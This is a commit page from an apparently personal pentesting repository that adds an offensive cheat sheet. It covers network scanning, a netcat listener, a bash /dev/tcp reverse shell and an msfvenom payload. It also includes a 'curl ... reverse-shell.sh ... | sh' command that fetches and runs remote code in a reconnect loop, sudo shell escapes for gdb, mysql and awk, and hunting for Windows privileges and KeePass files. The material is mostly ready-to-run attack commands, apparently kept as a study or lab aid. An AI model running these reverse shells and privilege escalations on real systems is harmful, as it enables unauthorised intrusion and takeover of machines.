Rh17S15/pentesting
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

links

Browse Source
This commit is contained in:
Rh17S15
2025-07-28 09:30:28 +02:00
parent 1d8f631216
commit ad56aad266
2 changed files with 248 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
Cheatsheet.md
View File

@@ -337,3 +337,6 @@ sudo mysql -e ’! /bin/sh’
strace -o /dev/null /bin/sh strace -o /dev/null /bin/sh
sudo awk ’BEGIN {system(“/bin/sh”)}’ sudo awk ’BEGIN {system(“/bin/sh”)}’
https://nextcloud.th-deg.de/s/ex5yzQ6NtGeKp32
https://github.com/Obedaya/scripts
https://mygit.th-deg.de/lg06087/pentesting

245
Cheatsheet.org Normal file
View File

@@ -0,0 +1,245 @@
**** to install:
- magic wormhole
- tldr
- rlwrap
-
#+BEGIN_SRC bash
sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
#+END_SRC
**** for keyring
-> if there is some kind of keyring error
#+BEGIN_SRC bash
sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
#+END_SRC
* information gathering
*** nmap
for quick scan of available ips
#+BEGIN_SRC bash
nmap -sn ip/24
#+END_SRC
to filter output for open ips
#+BEGIN_SRC bash
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
#+END_SRC
scan open ports:
#+BEGIN_SRC bash
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
#+END_SRC
*** dirb
#+BEGIN_SRC bash
dirb http://ip
#+END_SRC
**** bei windows
#+BEGIN_SRC bash
nmap --vuln ip
#+END_SRC
***** bei windows \+ smb
#+BEGIN_SRC bash
nmap --script smb-vuln* ip
#+END_SRC
* inital access
*** start listener:
#+BEGIN_SRC bash
rlwrap -cAr nc -nlvp 9002
#+END_SRC
*** reverse shell bash:
#+BEGIN_SRC bash
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
#+END_SRC
*** reverse shell file:
#+BEGIN_SRC bash
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
#+END_SRC
-> from revshells.com
*** untested:
Reverse Shell as a Service
1. On your machine:
#+BEGIN_SRC bash
nc -l 1337
or nlvp?
#+END_SRC
2. On the target machine:
#+BEGIN_SRC bash
curl https://reverse-shell.sh/yourip:1337 | sh
#+END_SRC
**** reconnecting:
#+BEGIN_SRC bash
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
#+END_SRC
* privilege escalation
** always run these:
#+BEGIN_SRC bash
sudo -l
#+END_SRC
if sudo doesn't work:
[[*TTY Spawn Shell]]
**** check cronjobs
#+BEGIN_SRC bash
ls /etc/cron.*
crontab -l
#+END_SRC
** TTY Spawn Shell
***** if sudo still doesn't work
use
#+BEGIN_SRC bash
sudo -S command
#+END_SRC
Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
*** Python spawn shell
#+BEGIN_SRC bash
python -c 'import pty; pty.spawn("/bin/bash")'
#+END_SRC
Fully Interactive TTY
**** All the steps to stabilize your shell
**The first step:**
#+BEGIN_SRC bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
#+END_SRC
Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still wont be able to use tab autocomplete or the arrow keys.
**Step two is:**
#+BEGIN_SRC bash
export TERM=xterm
#+END_SRC
This will give us access to term commands such as clear.
**Finally (and most importantly) we will background the shell using**
#+BEGIN_SRC bash
Ctrl + Z
#+END_SRC
Back in our own terminal we use
#+BEGIN_SRC bash
stty raw -echo; fg
#+END_SRC
This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
#+BEGIN_SRC bash
stty rows 38 columns 116
#+END_SRC
*** OS system spawn shell
#+BEGIN_SRC bash
echo os.system("/bin/bash")
#+END_SRC
*** Bash spawn shell
#+BEGIN_SRC bash
/bin/sh -i
#+END_SRC
*** Perl spawn shell
#+BEGIN_SRC bash
perl —e 'exec "/bin/sh";'
#+END_SRC
*** Ruby spawn shell
ruby: exec "/bin/sh"
*** Lua spawn shell
lua: os.execute("/bin/sh")
*** IRB spawn shell
exec "/bin/sh"
*** VI spawn shell
#+BEGIN_SRC bash
:!bash
#+END_SRC
*** VI(2) spawn shell
#+BEGIN_SRC bash
:set shell=/bin/bash:shell
#+END_SRC
*** Nmap spawn shell
#+BEGIN_SRC bash
!sh
#+END_SRC
**** Exiftools
Metadaten auslesen:
#+BEGIN_SRC bash
exiftool picture.png
#+END_SRC
Binwalk (Binary Daten exportieren):
#+BEGIN_SRC bash
binwalk -e picture.png
#+END_SRC
* Windows
*** WinPEAS
https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS
*** LOLBAS
https://lolbas-project.github.io/#
*** WADCOMS
https://wadcoms.github.io/
*** PrivescCheck Script as an alternative to WinPEAS
https://github.com/itm4n/PrivescCheck
*** RUN these while the other scripts are working
#+BEGIN_SRC powershell
whoami /priv
whoami /all
schtasks /query
#+END_SRC
*** for finding kbdx Files
https://github.com/ivanmrsulja/keepass2john
#+BEGIN_SRC powershell
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
#+END_SRC
quick Wins Linux:
gdb -nx -ex '!sh' -ex quit
sudo mysql -e '! /bin/sh'
strace -o /dev/null /bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'
evilwinrm
quick Wins Linux:
gdb -nx -ex '!sh' -ex quit
sudo mysql -e '! /bin/sh'
strace -o /dev/null /bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'